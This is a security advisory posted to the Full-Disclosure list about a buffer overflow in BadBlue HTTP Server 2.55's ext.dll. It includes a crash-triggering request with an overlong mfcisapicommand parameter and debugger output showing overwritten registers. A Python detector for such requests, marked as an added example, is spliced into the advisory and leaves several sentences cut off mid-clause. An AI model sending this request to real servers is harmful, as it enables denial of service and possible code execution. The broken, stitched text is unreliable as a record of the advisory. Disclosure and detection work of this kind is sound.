[Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow
From: Andres Tarasco (atarasco_at_sia.es)
To: "'firstname.lastname@example.org'" <email@example.com>
Date: Sat, 26 Feb 2005 18:30:16 +0100
SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer overflow
* Release Date:
February 26, 2005
Working Resources Inc. http://www.badblue.com
* Versions Affected:
Confirmed under Badblue HTTP Server v2.55
Critical (remote code execution)
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"
* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, the module that handles
BadBlue HTTP requests. The overflow is triggered by a specially crafted HTTP
request.
The buffer overflow in EXT.DLL is triggered when a malicious HTTP request
containing an mfcisapicommand parameter longer than 250 characters is
submitted. Several registers are overwritten, so it is possible to execute
code or to cause a denial of service by shutting down the server. The
following request can be used to crash the remote server.
GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
10042004 8b3e mov edi,[esi]
Successful exploitation of this flaw could allow remote code execution with
Upgrade to the latest available version. At this time, the vendor provides
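As an added, defender-side example (not part of the original advisory), the following check flags raw HTTP request lines that match the pattern described above: a request to ext.dll whose mfcisapicommand value exceeds 250 bytes. It decodes percent-encoding before measuring, so encoded padding is counted by its decoded length, and matches the module and parameter names case-insensitively; the sample request lines are constructed for illustration.

```python
# Added example, not code from the advisory or from BadBlue. Flags request
# lines carrying an overlong mfcisapicommand parameter to ext.dll.
from urllib.parse import urlsplit, unquote_to_bytes

MAX_MFCISAPI_LEN = 250  # threshold stated in the advisory ("more than 250 chars")


def _query_params(query: str):
    """Yield (lowercased name, percent-decoded value bytes) from a raw query."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        # Decode to bytes so the length reflects what the server would copy,
        # regardless of how the client encoded it.
        yield unquote_to_bytes(name).decode("latin-1").lower(), unquote_to_bytes(value)


def is_overlong_mfcisapi_request(request_line: str) -> bool:
    """True if a raw request line (e.g. 'GET /x?y HTTP/1.0') targets ext.dll
    with an mfcisapicommand value longer than MAX_MFCISAPI_LEN after decoding."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    target = urlsplit(parts[1])
    # Windows file names are case-insensitive, so /EXT.DLL reaches the same module.
    if not target.path.lower().endswith("/ext.dll"):
        return False
    return any(name == "mfcisapicommand" and len(value) > MAX_MFCISAPI_LEN
               for name, value in _query_params(target.query))


def scan_log(lines):
    """Return the 1-based line numbers of request lines that match."""
    return [i for i, line in enumerate(lines, 1) if is_overlong_mfcisapi_request(line)]


# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET /ext.dll?mfcisapicommand=loadpage&page=index.htx HTTP/1.0",   # normal
    "GET /ext.dll?mfcisapicommand=" + "A" * 300 + "&page=index.htx HTTP/1.0",
    "GET /EXT.DLL?page=index.htx&MfcISAPICommand=" + "%41" * 300 + " HTTP/1.1",
    "GET /index.htx?mfcisapicommand=" + "A" * 300 + " HTTP/1.0",       # not ext.dll
]

if __name__ == "__main__":
    for n in scan_log(SAMPLE_REQUESTS):
        print(f"line {n}: overlong mfcisapicommand sent to ext.dll")
```

Feeding it the request field extracted from a Common Log Format access log gives the same result; the function only looks at the method and target.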
version v2.6 that is available to download at
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* Disclosure Timeline:
December 2004 - Discovered
December 20, 2004 - Initial Vendor Notification
December 21, 2004 - Initial Vendor Response
January 3, 2005 - Vendor Patch released (v2.60)
February 26, 2005 - Public Disclosure
Full-Disclosure - We believe in it.